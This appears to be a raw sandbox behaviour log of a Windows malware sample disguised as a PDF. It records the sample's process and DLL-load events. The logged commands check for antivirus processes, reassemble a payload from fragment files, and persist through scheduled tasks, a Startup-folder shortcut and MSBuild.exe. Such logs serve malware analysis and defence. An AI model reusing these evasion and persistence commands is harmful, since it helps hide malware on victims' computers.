Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 186040
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "toolkitczechhappenwestminster" Texture
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Junk + ..\Screenshot + ..\Colombia + ..\Escorts + ..\Waiver + ..\Aboriginal + ..\Wherever + ..\Higher + ..\Amazon + ..\Releases + ..\Dame + ..\Economic + ..\Innovations + ..\Sampling + ..\Nuke + ..\Fellowship + ..\Brain + ..\Eat + ..\Shopping + ..\Constitution + ..\Planes + ..\Railroad + ..\Enhancing + ..\Locator + ..\Occasion + ..\Pay + ..\Cinema L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif Tracks.pif L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url" & echo URL="C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url" & exit
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K"
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8CF.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\winservices.exe C:\Users\user\AppData\Roaming\winservices.exe
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\winservices.exe "C:\Users\user\AppData\Roaming\winservices.exe"
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBB7A.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\winservices.exe "C:\Users\user\AppData\Roaming\winservices.exe"
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 186040	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "toolkitczechhappenwestminster" Texture	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Junk + ..\Screenshot + ..\Colombia + ..\Escorts + ..\Waiver + ..\Aboriginal + ..\Wherever + ..\Higher + ..\Amazon + ..\Releases + ..\Dame + ..\Economic + ..\Innovations + ..\Sampling + ..\Nuke + ..\Fellowship + ..\Brain + ..\Eat + ..\Shopping + ..\Constitution + ..\Planes + ..\Railroad + ..\Enhancing + ..\Locator + ..\Occasion + ..\Pay + ..\Cinema L	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif Tracks.pif L	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url" & echo URL="C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url" & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8CF.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\winservices.exe "C:\Users\user\AppData\Roaming\winservices.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBB7A.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\winservices.exe "C:\Users\user\AppData\Roaming\winservices.exe"

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
